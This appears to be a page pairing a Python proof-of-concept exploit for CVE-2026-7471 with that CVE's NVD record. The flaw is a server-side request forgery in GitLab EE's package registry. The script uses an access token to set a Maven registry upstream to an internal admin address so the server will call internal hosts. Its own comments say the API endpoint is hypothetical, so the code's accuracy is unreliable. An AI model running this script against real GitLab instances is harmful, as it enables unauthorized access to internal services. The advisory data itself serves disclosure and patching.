CVE-2026-7471

# Conceptual PoC for CVE-2026-7471 # This script demonstrates how an authenticated user might attempt to exploit the SSRF # by configuring a malicious upstream in the GitLab Package Registry. import requests import json # Configuration GITLAB_URL = "https://gitlab.example.com" PRIVATE_TOKEN = "glpat-xxxxxxxxxxxxxxxxxxxx" # User's access token PROJECT_ID = "123" MALICIOUS_UPSTREAM = "http://127.0.0.1:8080/admin" # Internal host target headers = { "PRIVATE-TOKEN": PRIVATE_TOKEN, "Content-Type": "application/json" } # Step 1: Get current registry settings # Endpoint is hypothetical based on GitLab API structure for package registries get_url = f"{GITLAB_URL}/api/v4/projects/{PROJECT_ID}/packages/maven" response = requests.get(get_url, headers=headers) print(f"Current settings status: {response.status_code}") # Step 2: Update registry upstream to point to internal host # This payload simulates the configuration change that triggers the SSRF payload = { "maven": { "forward": { "upstream": MALICIOUS_UPSTREAM } } } update_url = f"{GITLAB_URL}/api/v4/projects/{PROJECT_ID}/packages/maven" try: exploit_response = requests.put(update_url, headers=headers, data=json.dumps(payload)) if exploit_response.status_code == 200: print("[+] Successfully configured malicious upstream.") print(f"[+] Server may now request internal host: {MALICIOUS_UPSTREAM}") else: print(f"[-] Failed to configure upstream. Status: {exploit_response.status_code}") print(exploit_response.text) except Exception as e: print(f"Error: {e}")

{"cve": {"id": "CVE-2026-7471", "sourceIdentifier": "[email protected]", "published": "2026-05-14T06:16:25.477", "lastModified": "2026-05-14T18:50:47.943", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "GitLab has remediated an issue in GitLab EE affecting all versions from 18.8 before 18.9.7, 18.10 before 18.10.6, and 18.11 before 18.11.3 that could have allowed an authenticated user with control of a virtual registry upstream to make requests to internal hosts due to improper validation."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:N/A:N", "baseScore": 3.5, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "18.8.0", "versionEndExcluding": "18.9.7", "matchCriteriaId": "3B168A5B-5B96-48AA-882D-77529BCA8006"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "18.10.0", "versionEndExcluding": "18.10.6", "matchCriteriaId": "E79D4F10-88B3-4AA7-BC5E-3FC8FA698969"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "18.11.0", "versionEndExcluding": "18.11.3", "matchCriteriaId": "DA0D6580-3530-4D76-81CE-D852BCE0D411"}]}]}], "references": [{"url": "https://about.gitlab.com/releases/2026/05/13/patch-release-gitlab-18-11-3-released/", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://gitlab.com/gitlab-org/gitlab/-/work_items/594196", "source": "[email protected]", "tags": ["Broken Link"]}]}}